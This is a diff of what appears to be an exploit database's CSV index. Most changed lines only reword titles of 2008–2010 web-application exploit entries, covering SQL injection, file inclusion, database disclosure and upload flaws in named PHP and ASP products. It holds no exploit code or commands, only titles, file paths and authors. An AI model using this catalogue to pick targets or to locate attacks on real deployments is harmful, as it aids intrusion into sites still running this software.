 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0
 7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0
 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
 7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0
 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
-7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb' Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
-7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - (Authentication Bypass) SQL Injection",2008-12-14,Pouya_Server,asp,webapps,0
+7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
+7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - Authentication Bypass",2008-12-14,Pouya_Server,asp,webapps,0
 7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File",2008-12-14,SirGod,php,webapps,0
-7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0
-7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0
+7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0
+7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0
 7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting",2008-12-14,ahmadbady,php,webapps,0
-7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0
+7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - 'redir.php' SQL Injection",2008-12-14,nuclear,php,webapps,0
 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0
 7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0
 7457,platforms/php/webapps/7457.txt,"AvailScript Classmate Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0
-7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - (index.php lang) Local File Inclusion",2008-12-14,Osirys,php,webapps,0
+7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - 'lang' Parameter Local File Inclusion",2008-12-14,Osirys,php,webapps,0
 7459,platforms/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion",2008-12-14,BeyazKurt,php,webapps,0
 7461,platforms/php/webapps/7461.txt,"Flatnux - html/JavaScript Injection Cookie Grabber Exploit",2008-12-14,gmda,php,webapps,0
 7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0
 7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,php,webapps,0
 7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0
 7465,platforms/php/webapps/7465.txt,"isweb CMS 3.0 - SQL Injection / Cross-Site Scripting",2008-12-14,XaDoS,php,webapps,0
-7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0
-7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
-7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
+7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0
+7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
+7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
 7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
-7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
-7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
+7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
+7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
 7473,platforms/php/webapps/7473.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0
-7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - (lpro.php id) SQL Injection",2008-12-15,nuclear,php,webapps,0
-7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - 'Username' Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0
+7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - 'lpro.php' SQL Injection",2008-12-15,nuclear,php,webapps,0
+7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0
 7476,platforms/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,php,webapps,0
-7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - (Authentication Bypass) SQL Injection",2008-12-15,x0r,php,webapps,0
-7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents - 'print.php id' SQL Injection",2008-12-15,nÃ©tRoot,php,webapps,0
-7480,platforms/php/webapps/7480.txt,"CadeNix - 'cid' SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0
+7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - Authentication Bypass",2008-12-15,x0r,php,webapps,0
+7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents - SQL Injection",2008-12-15,nÃ©tRoot,php,webapps,0
+7480,platforms/php/webapps/7480.txt,"CadeNix - SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0
 7481,platforms/php/webapps/7481.txt,"WorkSimple 1.2.1 - Remote File Inclusion / Sensitive Data Disclosure",2008-12-15,Osirys,php,webapps,0
 7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection",2008-12-15,NoGe,php,webapps,0
-7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - 'right.php title' SQL Injection",2008-12-15,ZoRLu,php,webapps,0
+7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,php,webapps,0
 7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0
 7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
 7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
-7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - 'download.php' SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0
-7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGGuestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0
-7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - report.php (linkida) SQL Injection",2008-12-16,ka0x,php,webapps,0
+7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0
+7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",asp,webapps,0
+7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,php,webapps,0
 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps,0
 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0
 7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure",2008-12-16,"Cold Zero",php,webapps,0
 7494,platforms/php/webapps/7494.txt,"Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection",2008-12-16,ZoRLu,php,webapps,0
-7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - (authors.asp authorID) SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0
+7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0
 7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 - Cross-Site Scripting / Insecure Cookie Handling",2008-12-17,Osirys,php,webapps,0
 7499,platforms/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure",2008-12-17,Dxil,asp,webapps,0
 7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme - Arbitrary File Upload",2008-12-17,mNt,php,webapps,0
 7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injections",2008-12-17,Lidloses_Auge,php,webapps,0
-7504,platforms/php/webapps/7504.txt,"Joomla! Component Tech Article 1.x - (item) SQL Injection",2008-12-17,InjEctOr5,php,webapps,0
-7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0
+7504,platforms/php/webapps/7504.txt,"Joomla! Component Tech Article 1.x - SQL Injection",2008-12-17,InjEctOr5,php,webapps,0
+7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - 'menuID' Parameter SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0
 7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,php,webapps,0
-7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0
+7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0
 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary .PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0
 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0
 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0
 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps,0
 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0
-7514,platforms/php/webapps/7514.txt,"I-Rater Basic - 'messages.php' SQL Injection",2008-12-18,boom3rang,php,webapps,0
+7514,platforms/php/webapps/7514.txt,"I-Rater Basic - SQL Injection",2008-12-18,boom3rang,php,webapps,0
 7515,platforms/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0
-7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' SQL Injection",2008-12-18,fuzion,php,webapps,0
+7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' Parameter SQL Injection",2008-12-18,fuzion,php,webapps,0
 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0
-7519,platforms/php/webapps/7519.txt,"MyPHPsite - 'index.php mod' Local File Inclusion",2008-12-18,Piker,php,webapps,0
-7522,platforms/php/webapps/7522.pl,"MyPBS - 'index.php seasonID' SQL Injection",2008-12-19,Piker,php,webapps,0
+7519,platforms/php/webapps/7519.txt,"MyPHPsite - Local File Inclusion",2008-12-18,Piker,php,webapps,0
+7522,platforms/php/webapps/7522.pl,"MyPBS - 'seasonID' Parameter SQL Injection",2008-12-19,Piker,php,webapps,0
 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Change",2008-12-19,G4N0K,php,webapps,0
 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0
-7525,platforms/php/webapps/7525.txt,"Extract Website - 'download.php Filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0
+7525,platforms/php/webapps/7525.txt,"Extract Website - 'Filename' Parameter File Disclosure",2008-12-19,"Cold Zero",php,webapps,0
 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,php,webapps,0
-7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - (source.php p) Remote File Disclosure",2008-12-19,Piker,php,webapps,0
+7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - Remote File Disclosure",2008-12-19,Piker,php,webapps,0
 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Arbitrary File Upload",2008-12-19,Ams,php,webapps,0
 7529,platforms/php/webapps/7529.txt,"Constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0
-7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Blind SQL Injection",2008-12-21,katharsis,php,webapps,0
+7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,php,webapps,0
 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0
-7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,php,webapps,0
+7532,platforms/php/webapps/7532.txt,"Chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,php,webapps,0
 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0
-7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - (image_upload.php) Arbitrary File Upload",2008-12-21,Piker,php,webapps,0
+7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - 'image_upload.php' Arbitrary File Upload",2008-12-21,Piker,php,webapps,0
 7538,platforms/php/webapps/7538.txt,"Joomla! Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0
 7539,platforms/php/webapps/7539.txt,"Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0
 7540,platforms/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",php,webapps,0
-7541,platforms/php/webapps/7541.pl,"RSS Simple News - 'news.php pid' SQL Injection",2008-12-22,Piker,php,webapps,0
-7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' File Disclosure",2008-12-22,SirGod,php,webapps,0
+7541,platforms/php/webapps/7541.pl,"RSS Simple News - SQL Injection",2008-12-22,Piker,php,webapps,0
+7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' Parameter File Disclosure",2008-12-22,SirGod,php,webapps,0
 7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote File Disclosure",2008-12-22,GoLd_M,php,webapps,0
-7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - (check_url.php url) Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0
+7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0
 7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution",2008-12-22,Osirys,php,webapps,0
-7546,platforms/php/webapps/7546.txt,"Joomla! Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0
+7546,platforms/php/webapps/7546.txt,"Joomla! Component Volunteer 2.0 - SQL Injection",2008-12-22,boom3rang,php,webapps,0
 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure",2008-12-22,StAkeR,php,webapps,0
 7549,platforms/php/webapps/7549.txt,"Roundcube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0
-7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Authentication Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0
-7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0
+7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - Authentication Bypass",2008-12-22,StAkeR,php,webapps,0
+7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0
 7553,platforms/php/webapps/7553.sh,"Roundcube Webmail 0.2b - Remote Code Execution",2008-12-22,Hunger,php,webapps,0
 7557,platforms/php/webapps/7557.txt,"PHPmotion 2.1 - Cross-Site Request Forgery",2008-12-23,Ausome1,php,webapps,0
-7558,platforms/php/webapps/7558.txt,"PHPLD 3.3 - (page.php name) Blind SQL Injection",2008-12-23,fuzion,php,webapps,0
+7558,platforms/php/webapps/7558.txt,"PHPLD 3.3 - Blind SQL Injection",2008-12-23,fuzion,php,webapps,0
 7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 - (password_recovery.php) Blind SQL Injection",2008-12-23,s4avrd0w,php,webapps,0
 7560,platforms/php/webapps/7560.txt,"CMS NetCat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0
 7561,platforms/php/webapps/7561.txt,"phpGreetCards - Cross-Site Scripting / Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0
@ -20407,7 +20407,7 @@ id,file,description,date,author,platform,type,port
 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0
 7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0
 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0
-7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - 'viewarticle.php id' Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0
+7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0
 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0
 7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0
 7667,platforms/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0
@ -20568,7 +20568,7 @@ id,file,description,date,author,platform,type,port
 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0
 7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0
 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0
-7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
+7922,platforms/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
 7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0
 7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
@ -20577,7 +20577,7 @@ id,file,description,date,author,platform,type,port
 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - Authentication Bypass",2009-01-30,Dimi4,php,webapps,0
 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0
 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0
-7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
+7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0
 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
 7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
@ -20602,7 +20602,7 @@ id,file,description,date,author,platform,type,port
 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
 7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0
 7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
-7969,platforms/php/webapps/7969.txt,"flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0
+7969,platforms/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0
 7972,platforms/php/webapps/7972.py,"OpenFiler 2.3 - (Authentication Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0
 7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusion",2009-02-04,fuzion,php,webapps,0
 7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - (synTarget) Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0
@ -20881,10 +20881,10 @@ id,file,description,date,author,platform,type,port
 8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0
 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0
-8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0
+8483,platforms/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0
 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
 8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0
-8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
+8488,platforms/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0
 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,php,webapps,0
@ -21589,7 +21589,7 @@ id,file,description,date,author,platform,type,port
 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps,0
 9706,platforms/php/webapps/9706.txt,"Joomla! Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0
 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0
-9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
+9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' Parameter SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0
 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
 9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0
@ -22494,7 +22494,7 @@ id,file,description,date,author,platform,type,port
 11547,platforms/php/webapps/11547.txt,"PHP Auktion Pro SQL - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0
 11548,platforms/php/webapps/11548.txt,"Top Auktion - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0
 11549,platforms/php/webapps/11549.pl,"Joomla! Component user_id com_sqlreport - Blind SQL Injection",2010-02-23,snakespc,php,webapps,0
-11550,platforms/php/webapps/11550.txt,"worksimple_1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,php,webapps,0
+11550,platforms/php/webapps/11550.txt,"WorkSimple 1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,php,webapps,0
 11551,platforms/php/webapps/11551.txt,"Softbiz Jobs - Multiple SQL Injections",2010-02-23,"Easy Laster",php,webapps,0
 11553,platforms/php/webapps/11553.txt,"Tinypug 0.9.5 - Cross-Site Request Forgery (Password Change)",2010-02-23,AmnPardaz,php,webapps,0
 11554,platforms/php/webapps/11554.txt,"QuickDev 4 PHP - Database Disclosure",2010-02-23,ViRuSMaN,php,webapps,0
@ -24319,7 +24319,7 @@ id,file,description,date,author,platform,type,port
 15819,platforms/php/webapps/15819.txt,"Joomla! Component 'com_xmovie' 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0
 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0
 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - Cross-Site Request Forgery (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0
-15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0
+15824,platforms/php/webapps/15824.txt,"Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0
 15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0
 15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps,0
